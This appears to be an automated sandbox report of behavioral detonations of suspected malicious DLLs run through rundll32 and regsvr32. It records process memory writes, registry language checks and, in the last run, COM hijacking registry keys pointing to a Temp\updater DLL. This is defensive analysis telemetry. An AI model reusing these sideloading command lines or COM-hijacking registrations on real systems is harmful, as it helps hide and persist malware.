System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3100 wrote to memory of 2284 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3100 wrote to memory of 2284 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3100 wrote to memory of 2284 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3056 wrote to memory of 1776 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3056 wrote to memory of 1776 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3056 wrote to memory of 1776 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:21
Platform
win7-20241010-en
Max time kernel
121s
Max time network
129s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20241010-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
145s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 100 wrote to memory of 464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 100 wrote to memory of 464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 100 wrote to memory of 464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 268
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
122s
Max time network
127s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
145s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3416 wrote to memory of 4176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3416 wrote to memory of 4176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3416 wrote to memory of 4176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20241010-en
Max time kernel
121s
Max time network
130s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
151s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2716 wrote to memory of 2372 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2716 wrote to memory of 2372 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2716 wrote to memory of 2372 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
154s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4224 wrote to memory of 3988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4224 wrote to memory of 3988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4224 wrote to memory of 3988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
151s
Command Line
Signatures
Event Triggered Execution: Component Object Model Hijacking
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ServerMain\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.NameDisp | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.TVWizard\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ = "VideoAudioControl Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73BCA54E-6AEB-4597-8F27-E1284FF12722}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorCorrection\CurVer\ = "DisplayServer.ColorCorrection.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\VersionIndependentProgID\ = "DisplayServer.MultiMon" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ProgID\ = "DisplayServer.RotateDisplay.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1\ = "SetupDigitalAudio Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.NameDisp.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ProgID\ = "DisplayServer.VideoAudioControl.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VariableRefreshRate\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryMultiMon | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.IdentifyDisp.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiMon.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{894BF76C-115F-44B7-9B32-ABFA7E6A804A}\ProgID\ = "DisplayServer.MultiView.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos.1\CLSID\ = "{074BFFFD-4E50-42c1-A7EB-40D9D70F2471}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustSizePosExt\CLSID\ = "{6539579C-2657-45E5-985F-835E197959C2}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez\ = "CustomRez Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\ = "MultiMon Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\VersionIndependentProgID\ = "DisplayServer.VideoHDCPStatus" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\VersionIndependentProgID\ = "DisplayServer.Config" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ = "RotateDisplay Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\CLSID\ = "{01367108-5EE2-4E1C-A8DE-24438065ABC9}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\ProgID\ = "DisplayServer.IdentifyDisp.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez\CurVer\ = "DisplayServer.CustomRez.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{49F585C0-CE12-4306-9100-B6A28857B10B}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
